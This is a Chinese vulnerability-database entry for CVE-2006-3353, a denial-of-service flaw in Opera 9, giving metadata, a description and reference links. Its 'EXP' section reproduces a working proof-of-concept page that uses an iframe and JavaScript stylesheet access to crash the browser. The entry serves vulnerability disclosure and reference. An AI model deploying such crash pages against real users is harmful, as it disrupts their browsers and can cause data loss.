Opera Document Stylesheet iframe和JavaScript拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110542 漏洞类型 其他
发布时间 2006-07-01 更新时间 2007-08-13
CVE编号 CVE-2006-3353 CNNVD-ID CNNVD-200607-015
漏洞平台 Multiple CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/1972
https://cxsecurity.com/issue/WLB-2006070036
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200607-015
|漏洞详情
Opera9可以使远程攻击者借助与可以访问特定样式表属性的iframe和JavaScript有关的,可触发越界内存访问的特制网页,引起拒绝服务(崩溃)。
|漏洞EXP
<!-- Opera 9 DOS exploit, discovered by 
     Ahmad Muammar W.K (y3dips[at]echo[dot]or[dot]id) 
     http://y3d1ps.blogspot.com
//-->

<html>
<iframe src="palsu.php" name="fake"  ></iframe> 
<script type="text/javascript">
function mystyle() {
    if (fake.document.styleSheets.length == 1 ) 
	{
      f = document.forms["basicstyle"].elements;
      for (j = 0; j < f.length; j++) 
	  	{
       	if (f[j].name == 'fsmain');
      	}  
      }

 }
mystyle();
</script>
</html>

<!-- live exploit :
     http://y3dips.echo.or.id/opera9-dos/
//-->

# milw0rm.com [2006-07-01]
|参考资料

来源:XF
名称:opera-iframe-dos(27531)
链接:http://xforce.iss.net/xforce/xfdb/27531
来源:BID
名称:18758
链接:http://www.securityfocus.com/bid/18758
来源:BUGTRAQ
名称:20060701OPERAWebBrowser9DenialOFService
链接:http://www.securityfocus.com/archive/1/archive/1/438872/100/0/threaded
来源:OSVDB
名称:27511
链接:http://www.osvdb.org/27511
来源:MILW0RM
名称:1972
链接:http://www.milw0rm.com/exploits/1972
来源:MILW0RM
名称:1972
链接:http://milw0rm.com/exploits/1972
来源:MISC
链接:http://echo.or.id/adv/adv35-y3dips-2006.txt
来源:SREASON
名称:1185
链接:http://securityreason.com/securityalert/1185